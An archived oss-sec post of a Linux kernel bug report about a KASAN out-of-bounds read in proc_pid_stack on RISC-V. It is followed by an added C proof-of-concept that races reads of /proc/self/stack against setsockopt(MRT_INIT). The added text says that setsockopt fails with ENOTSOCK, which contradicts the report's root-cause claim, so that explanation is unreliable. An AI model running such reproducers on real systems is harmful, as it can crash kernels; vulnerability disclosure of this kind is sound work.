oss-sec mailing list archives

Linux kernel: KASAN: out-of-bounds Read in proc_pid_stack on RISC-V


From: 许佳凯 <xujiakai24 () mails ucas ac cn>
Date: Sat, 11 Oct 2025 14:49:48 +0800 (GMT+08:00)




-----Original Message-----
From: 许佳凯 <xujiakai24 () mails ucas ac cn>
Sent: 2025-10-11 14:48:52 (Saturday)
To: security () kernel org
Cc: paul.walmsley () sifive com, palmer () dabbelt com, aou () eecs berkeley edu, syzkaller () googlegroups com, linux-riscv () lists infradead org
Subject: [BUG REPORT] KASAN: out-of-bounds Read in proc_pid_stack on RISC-V

Dear Linux Kernel Security Team and Maintainers,
We would like to report a security vulnerability in the Linux kernel, identified as a KASAN out-of-bounds read, which 
we discovered through fuzz testing.

1. Affected Version
The bug was successfully reproduced on the upstream Linux kernel version 6.16, specifically at commit 
038d61fd642278bab63ee8ef722c50d10ab01e8f.


2. Build Configuration
The kernel was built with the accompanying configuration file (see attachment: .config), which includes the necessary 
KASAN options to detect this issue.


3. Proof of Concept and Reproduction
We have provided a reliable C reproducer program (repro.cprog attached) to trigger this bug. Additional diagnostic 
information, including full kernel logs and system context, can be found in the attached files log0, report0, and 
machineInfo0.
The vulnerability is triggered by the following sequence of system calls:
r0 = syz_open_procfs(0x0, &(0x7f0000000000)='stack\x00');
read(r0, &(0x7f0000000040)=""/5, 0x5); // (async)
setsockopt$MRT_INIT(r0, 0x0, 0xc8, 0x0, 0x0);


4. Root Cause Analysis
The core issue is a race condition that corrupts kernel state. The bug occurs when one thread initiates a kernel stack 
walk by reading the /proc/self/stack file, while a second thread concurrently issues a setsockopt() system call with the 
MRT_INIT command on the same file descriptor. This setsockopt operation is invalid for a proc filesystem file 
descriptor and inadvertently corrupts internal kernel data structures associated with it. This corruption causes the 
first thread's subsequent stack frame traversal (walk_stackframe) to compute an invalid memory address, resulting in an 
out-of-bounds read that is caught by KASAN.


Thank you for your attention to this matter.

Attachments: machineInfo0, report0, repro.cprog, log0, .config
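The syzlang sequence in the report, rendered as a stand-alone C program. This is an added example, not the attached repro.cprog or any code from the reporters, and it uses fork() rather than a second thread: the open file description, and with it the proc inode of the thread-group leader that /proc/self resolves to, is shared either way, so in both variants one task walks the leader's kernel stack while the leader is executing setsockopt(). The path /proc/self/stack, level 0 (IPPROTO_IP) and option 0xc8 (MRT_INIT) come from the report; the helper names, iteration counts and the fallback #define are this example's own assumptions. Two caveats a practitioner will run into: proc_pid_stack() refuses the read with EACCES unless the opener holds CAP_SYS_ADMIN (the file is root-only precisely because unwinding a running task is racy), so run it as root and check the reported read() errno before trusting a quiet run; and setsockopt() on a procfs fd is rejected with ENOTSOCK by the generic socket-fd lookup before any protocol code runs, so what the program exercises is a concurrent stack walk of a task that is inside a system call on the same file. Observing the KASAN report requires a RISC-V kernel built with the attached config; elsewhere the program only reports what each call returned.

```c
/* Added example, not code from the report: the syzkaller sequence above
 * rendered as plain C.  The path and the constants come from the report;
 * the helper names, iteration counts and the fork-based concurrency are
 * this example's own assumptions.  Build: cc -Wall -o stack_race stack_race.c */
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef MRT_INIT
#define MRT_INIT 200   /* MRT_BASE in <linux/mroute.h>; the 0xc8 in the syzlang */
#endif

/* setsockopt$MRT_INIT(r0, 0x0, 0xc8, 0x0, 0x0): level 0 is IPPROTO_IP.
 * Returns 0 on success, else the errno.  For a non-socket fd the kernel
 * returns ENOTSOCK from the generic fd lookup in __sys_setsockopt(), before
 * any protocol code runs. */
int setsockopt_mrt_init(int fd)
{
    if (setsockopt(fd, IPPROTO_IP, MRT_INIT, NULL, 0) == 0)
        return 0;
    return errno;
}

/* One round of the race on an already-open fd.  A forked child hammers
 * read() on the shared open file description while the parent hammers
 * setsockopt().  /proc/self names the thread-group leader, so the opened
 * inode belongs to the parent and the child's read() walks the parent's
 * kernel stack while the parent is inside setsockopt(); the report's
 * reproducer does the same with a second thread of one process.
 * Returns the errno of the parent's last setsockopt() (0 if it succeeded),
 * or -errno if fork() failed.  *read_errno receives the errno of the
 * child's last read() (0 = the read, and hence the stack walk, ran). */
int race_on_fd(int fd, unsigned iters, int *read_errno)
{
    char buf[5];                          /* read(r0, &buf, 0x5) */
    pid_t child = fork();
    if (child < 0)
        return -errno;
    if (child == 0) {
        int rerr = 0;
        for (unsigned i = 0; i < iters; i++) {
            (void)lseek(fd, 0, SEEK_SET); /* seq_file: rewind so each read re-walks */
            rerr = read(fd, buf, sizeof buf) < 0 ? errno : 0;
        }
        _exit(rerr & 0xff);
    }
    int last = 0, status = 0;
    for (unsigned i = 0; i < iters; i++)
        last = setsockopt_mrt_init(fd);
    waitpid(child, &status, 0);
    if (read_errno)
        *read_errno = WIFEXITED(status) ? WEXITSTATUS(status) : -1;
    return last;
}

/* syz_open_procfs(0x0, "stack") opens /proc/self/stack.  Returns 0 after
 * `rounds` rounds of `iters` iterations, or -errno if open() fails.  Note
 * that proc_pid_stack() refuses the read with EACCES unless the opener has
 * CAP_SYS_ADMIN, so an unprivileged run opens the file but never walks a
 * stack: check *read_errno before trusting a quiet run. */
int run_repro(const char *path, unsigned rounds, unsigned iters,
              int *setsockopt_errno, int *read_errno)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -errno;
    int serr = 0, rerr = 0;
    for (unsigned r = 0; r < rounds; r++)
        serr = race_on_fd(fd, iters, &rerr);
    close(fd);
    if (setsockopt_errno) *setsockopt_errno = serr;
    if (read_errno) *read_errno = rerr;
    return 0;
}

int main(void)
{
    int serr = 0, rerr = 0;
    int rc = run_repro("/proc/self/stack", 200, 1000, &serr, &rerr);
    if (rc < 0) {
        printf("open(/proc/self/stack): %s\n", strerror(-rc));
        return 1;
    }
    printf("read(): %s\nsetsockopt(MRT_INIT): %s\n",
           rerr ? strerror(rerr) : "ok, stack walk ran (check dmesg for KASAN)",
           serr ? strerror(serr) : "ok");
    return 0;
}
```

Run it as root on the RISC-V KASAN kernel; the KASAN report, if one fires, lands in the kernel log, and the program itself only prints the errno each side of the race observed.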
